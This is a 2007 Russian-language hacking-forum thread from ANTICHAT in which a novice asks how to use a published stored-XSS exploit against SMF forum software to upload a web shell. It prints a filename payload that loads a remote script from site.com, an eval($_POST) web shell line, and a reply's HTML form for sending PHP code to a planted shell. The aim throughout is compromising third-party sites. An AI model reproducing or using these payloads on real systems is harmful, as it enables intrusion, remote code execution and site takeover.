HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу SMF Active XSS (тупой я)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SMF Active XSS (тупой я)
  #1  
Старый 08.07.2007, 14:41
Emory
Новичок
Регистрация: 12.03.2006
Сообщений: 19
С нами: 10612631

Репутация: 29
По умолчанию SMF Active XSS (тупой я)
здрасте пишу тут редко... в основном читаю и пытаюсь сам разобраться... но похоже по жизни я тупой... короче прошу кое-что объснить если не трудно...

решил я сий метод опробовать...
установил SMF 1.1.3 и решил все сделать как написано тут (http://forum.antichat.ru/thread42244-SMF.html)
Значит узнать есть ли в этой версии
"Отсутствует фильтрация atachment filename" я не знал как ... но там написано 1.1.2... поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html)
но там про это ни слова поэтому решил попробовать (я вам грил я нуб)
ну да ладно
значит начал тока готовиться()
тупо скопировал ваш скрипт и тут подумал а нужно ли в нем что либо менять? в принципе это мой первый вопрос... ну короче я ничего не менял сохранил его ну и все... (зы решил я залить шелл)
тут возник еще один вопрос
Код:
name<img src=. width=1 height=1 onerror=javascript:var&#32s=document.createElement('script');s.src='http:  &#47&#47site.com&#47smfexp.js';document.documentElement.firstChild.  appendChild(s);>.txt
вот в этом тоже наверное что либо надо менять? так как посмотрел я на src=. и наверное тут должен быть сам шел... (это мои нубские предположения) (шел я решил взять (r57shell.php)( ps то что я делаю ваще прально??)
и видимо я должен буду туда ссылку на файл подставить? эт уже 3 или 4 вопрос...
еще не понял
Цитата:
По адресу http://vulnsite.com/smf/Themes/default/index.php получаем web shell
index.php который содержит код
Код:
@eval($_POST['cd']);
для чего дан этот код? если шел уже буит работать?

ps сразу грю сильно не ругайтесь...
ps2 я понимаю скорее всего в версии 1.1.3 это уже исправлено но тогда представьте что я это делал на версии 1.1.2 ..хотя бы поясните ост вопросы если не трудно
ps3 заранее пасиб
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Emory; 08.07.2007 в 14:44..
 
Ответить с цитированием

  #2  
Старый 09.07.2007, 13:19
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию
Цитата:
для чего дан этот код? если шел уже буит работать?
отправляешь скрипту пост запросы с шелл коммандами с параметром cd ..

а то что выше.. это не исполнение комманд.. это xss, читай маны
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #3  
Старый 09.07.2007, 13:43
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию
Прочитал что ты там написал понял только последний твой вопрос... Вот его тебе обясню подробнее...
После заливки шела берешь создаешь у ся на компе вот такую html страницу:
Код:
<form action="+++адрес скрипта+++" method="post">
Выполнить пхп код: <input type="text" name="cd" value=""> 
<input type="submit" value="выполнить">
</form>
Вводишь какойнить пхп код который хочешь выполнить, меняешь +++адрес скрипта+++ на тот шо тебе нужен, давишь выполнить и усе...
__________________
Кто я?..
 
Ответить с цитированием

  #4  
Старый 13.07.2007, 13:35
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
С нами: 10286027

Репутация: 91
По умолчанию
вот тут есть несколько примероф, может что полезнова для себя отыщеш
http://forum.antichat.ru/thread43633.html
 
Ответить с цитированием

  #5  
Старый 17.07.2007, 20:46
Emory
Новичок
Регистрация: 12.03.2006
Сообщений: 19
С нами: 10612631

Репутация: 29
По умолчанию
спасибо
сейчас буду ознакамливаться


только куда сувать сам шелл? его адрес?
Последний раз редактировалось Emory; 18.07.2007 в 20:37..
 
Ответить с цитированием

  #6  
Старый 18.07.2007, 16:37
bopoh13
Участник форума
Регистрация: 31.10.2006
Сообщений: 212
С нами: 10277398

Репутация: 50
По умолчанию
Цитата:
Сообщение от Emory  
поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html)
но там про это ни слова поэтому решил попробовать
Вопрос уже звучал: _http://www.simplemachines.ru/index.php/topic,2260.msg13571.html#msg13571
И был ответ (читать с цитаты): _http://www.simplemachines.ru/index.php/topic,2260.msg13666.html#msg13666
Ссылка на модуль (естественно, все на английском): _http://www.modsecurity.org/download/index.html

Хочу узнать, это гон?
 
Ответить с цитированием

  #7  
Старый 23.07.2007, 00:08
Emory
Новичок
Регистрация: 12.03.2006
Сообщений: 19
С нами: 10612631

Репутация: 29
По умолчанию
мде
короче все что было (в моих силах) я сделал...
понятно что профы взломают но мне не удалось...
поюзал сплойт попробывал чрез аватарку фотку итд... стоят ограничения везде...
сканил сканером ничего особо важного=(
похоже мне такой сайт с форумом который уже залатан...
в принципе похоже что Smf так свой баг и не исправил....
спасиб всем...=)
пойдем дальше+)
 
Ответить с цитированием

  #8  
Старый 01.10.2007, 14:06
bopoh13
Участник форума
Регистрация: 31.10.2006
Сообщений: 212
С нами: 10277398

Репутация: 50
По умолчанию
Лавочку прикрыли =/
_http://www.simplemachines.org/community/index.php?topic=196380.0
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
PsychoStats Active XSS Isis Уязвимости 2 08.04.2007 08:22
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.